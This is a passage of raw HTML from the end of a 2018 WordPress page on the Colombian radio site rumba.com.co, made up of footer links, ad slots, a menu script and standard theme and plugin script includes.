						<a href="https://twitter.com/rumbabogotafm" alt="Twitter" target="_blank"><i class="fa fa-twitter-square fa-2"></i></a>
					</li>
																	<li class="foot-soc-inst">
						<a href="https://www.instagram.com/rumbabogotafm/" alt="Instagram" target="_blank"><i class="fa fa-instagram fa-2"></i></a>
					</li>
																													<li class="foot-soc-rss">
						<a href="http://www.rumba.com.co/feed/rss/" target="_blank"><i class="fa fa-rss-square fa-2"></i></a>
					</li>
							</ul>
		</div><!--foot-social-->
	</div><!--foot-bottom-->
</footer>							</div><!--post-content-contain-->
						</div><!--post-content-in-->
					</div><!--post-content-out-->
				</div><!--post-social-in-->
			</div><!--post-social-out-->
		</div><!--content-in-->
	</div><!--content-out-->
			<div id="prev-next-wrap">
							<div id="prev-post-wrap">
					<div id="prev-post-arrow" class="relative">
						<i class="fa fa-angle-left fa-4"></i>
					</div><!--prev-post-arrow-->
					<div class="prev-next-text">
						<a href="http://www.rumba.com.co/destacado/silvestre-dangond-y-nicky-jam-volveran-a-hacer-una-cancion-juntos/" rel="prev">Silvestre Dangond y Nicky Jam volverán a hacer una canción juntos</a>					</div><!--prev-post-text-->
				</div><!--prev-post-wrap-->
								</div><!--prev-next-wrap-->
			</div><!--content-wrapper-->

                
                    						                        
                        
<div class="layerfijoscroll">
<!-- /205320464/RUMBA/INTERNAS/RUMBA_Internas_LayerFijoalScroll_DM', [[320, 50], [990, 40]] -->
<div id='div-gpt-ad-1491336401500-6'>
<script>
cX.callQueue.push(['invoke', function() {
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491336401500-6'); });
</script>
</div>
</div>


<!-- /205320464/RUMBA/INTERNAS/RUMBA_Internas_InRead_DM -->
<div id='div-gpt-ad-1511453077513-0' style='height:1px; width:1px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1511453077513-0'); });
</script>
</div>

                                                                                            
                                        
                        




<script type="text/javascript">
jQuery(document).ready(function($) {

	// Main Menu Dropdown Toggle
	$('.menu-item-has-children a').click(function(event){
	  event.stopPropagation();
	  location.href = this.href;
  	});

	$('.menu-item-has-children').click(function(){
    	  $(this).addClass('toggled');
    	  if($('.menu-item-has-children').hasClass('toggled'))
    	  {
    	  $(this).children('ul').toggle();
	  $('.fly-nav-menu').getNiceScroll().resize();
	  }
	  $(this).toggleClass('tog-minus');
    	  return false;
  	});

	// Main Menu Scroll
	$(window).load(function(){
	  $('.fly-nav-menu').niceScroll({cursorcolor:"#888",cursorwidth: 7,cursorborder: 0,zindex:999999});
	});

});
</script>


<script type='text/javascript' src='http://www.rumba.com.co/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.rumba.com.co/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
jQuery(document).ready(function(jQuery){jQuery.datepicker.setDefaults({"closeText":"Cerrar","currentText":"Hoy","monthNames":["enero","febrero","marzo","abril","mayo","junio","julio","agosto","septiembre","octubre","noviembre","diciembre"],"monthNamesShort":["Ene","Feb","Mar","Abr","May","Jun","Jul","Ago","Sep","Oct","Nov","Dic"],"nextText":"Siguiente","prevText":"Previo","dayNames":["domingo","lunes","martes","mi\u00e9rcoles","jueves","viernes","s\u00e1bado"],"dayNamesShort":["Dom","Lun","Mar","Mie","Jue","Vie","Sab"],"dayNamesMin":["D","L","M","X","J","V","S"],"dateFormat":"MM d, yy","firstDay":1,"isRTL":false});});
</script>
<script type='text/javascript' src='http://www.rumba.com.co/wp-includes/js/comment-reply.min.js?ver=4.9.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var pollsL10n = {"ajax_url":"http:\/\/www.rumba.com.co\/wp-admin\/admin-ajax.php","text_wait":"Tu \u00faltima petici\u00f3n est\u00e1 a\u00fan proces\u00e1ndose. Por favor, espera un momento \u2026","text_valid":"Por favor, elige una respuesta v\u00e1lida para la encuesta.","text_multiple":"N\u00famero m\u00e1ximo de opciones permitidas:","show_loading":"1","show_fading":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.rumba.com.co/wp-content/plugins/wp-polls/polls-js.js?ver=2.73.8'></script>
<script type='text/javascript' src='http://www.rumba.com.co/wp-content/themes/topnews/js/scripts.js?ver=4.9.3'></script>
<script type='text/javascript' src='http://www.rumba.com.co/wp-content/themes/topnews/js/jquery.nicescroll.min.js?ver=4.9.3'></script>
<script type='text/javascript' src='http://www.rumba.com.co/wp-content/themes/topnews/js/jquery.infinitescroll.min.js?ver=4.9.3'></script>
<script type='text/javascript' src='http://www.rumba.com.co/wp-content/themes/topnews/js/retina.js?ver=4.9.3'></script>
<script type='text/javascript' src='http://www.rumba.com.co/wp-includes/js/wp-embed.min.js?ver=4.9.3'></script>

 

</body>
</html>


<!--
Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Page Caching using disk: enhanced 
Caching de base de datos 13/66 consultas en 0.038 segundos usando disk

Served from: www.rumba.com.co @ 2018-03-04 14:03:28 by W3 Total Cache
-->